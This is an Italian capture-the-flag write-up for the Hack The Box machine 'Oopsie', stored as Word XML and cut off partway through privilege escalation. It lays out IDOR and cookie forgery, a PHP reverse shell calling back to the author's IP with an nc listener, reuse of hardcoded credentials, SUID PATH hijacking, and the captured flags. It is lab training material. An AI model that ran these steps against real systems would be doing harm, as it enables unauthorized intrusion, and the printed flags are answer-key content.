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C0392B"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">HTB Write-Up: Oopsie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Hack The Box — Easy Linux Machine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ECF0F1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Machine</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Oopsie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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ECF0F1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Hack The Box</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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ECF0F1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OS</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Linux (Ubuntu 18.04)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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ECF0F1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Difficulty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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ECF0F1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">User Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">f2c74ee8db7983851ab2a96a44eb7981</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="34495E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ECF0F1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Root Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6860"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDFEFE" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">af13b0bee69f8a877c3faf667f7beacf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Sommario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Oopsie è una macchina Linux di difficoltà Easy su Hack The Box. Il percorso di compromissione passa attraverso una vulnerabilità IDOR nel pannello di login web, un file upload non protetto per ottenere una reverse shell, credenziali hardcoded nel codice sorgente per il lateral movement, e infine un PATH hijacking su un binario SUID per l'escalation a root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap Scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Aggiunto l'host al file /etc/hosts per comodità:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "10.129.81.156 Oopsie" | sudo tee -a /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan completo con rilevamento versioni e script di default:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -sV -sC -p- Oopsie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Risultati rilevanti:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">22/tcp — OpenSSH 7.6p1 (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">80/tcp — Apache httpd 2.4.29 (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Web Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Individuazione pannello di login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Esplorando il sito su porta 80 e analizzando il codice sorgente, è stata trovata una pagina di login non pubblicizzata:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http://oopsie/cdn-cgi/login/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Effettuando il login come guest, il sistema espone i seguenti cookie di sessione:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">user=2233</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">role=guest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">IDOR — Accesso Admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigando alla pagina degli account con id=1 è possibile vedere le credenziali dell'amministratore:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http://oopsie/cdn-cgi/login/admin.php?content=accounts&amp;id=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'Access ID dell'admin risulta essere 34322. Modificando i cookie nel browser:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">user → 34322</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">role → admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Si ottiene accesso al pannello admin inclusa la funzionalità di upload file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Foothold — Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">File Upload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Con i cookie admin, è stata caricata una PHP reverse shell (PentestMonkey) modificata con l'IP della VPN (tun0):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ip = '10.10.15.250';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$port = 4444;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Directory di upload individuata tramite fuzzing con ffuf:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://Oopsie/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Risultato: /uploads (Status 301)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Esecuzione della shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In ascolto su Kali:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger della shell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://Oopsie/uploads/shell.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Accesso ottenuto come www-data (uid=33).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Lateral Movement — robert</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nel codice sorgente dell'applicazione web sono state trovate credenziali in chiaro per il database MySQL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /var/www/html/cdn-cgi/login/db.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">// robert : M3g4C0rpUs3r!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le credenziali sono riutilizzate per l'utente di sistema:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">su robert</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">User flag ottenuta:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">f2c74ee8db7983851ab2a96a44eb7981</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Privilege Escalation — root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID Binary — bugtracker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ricerca di file appartenenti al gruppo bugtracker (di cui robert fa parte):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -group bugtracker 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">→ /usr/bin/bugtracker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Il binario ha il bit SUID impostato (owner: root):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Analisi con strings: il binario chiama cat senza path assoluto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">strings /usr/bin/bugtracker | grep cat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">→ cat /root/reports/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Poiché il binario SUID esegue cat senza specificare il path completo (/bin/cat), è possibile creare un file cat fasullo in /tmp e anteporre /tmp al PATH. Quando bugtracker chiamerà cat, troverà prima il nostro file ed eseguirà /bin/bash con i privilegi di root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /tmp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">echo '/bin/bash' &gt; cat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
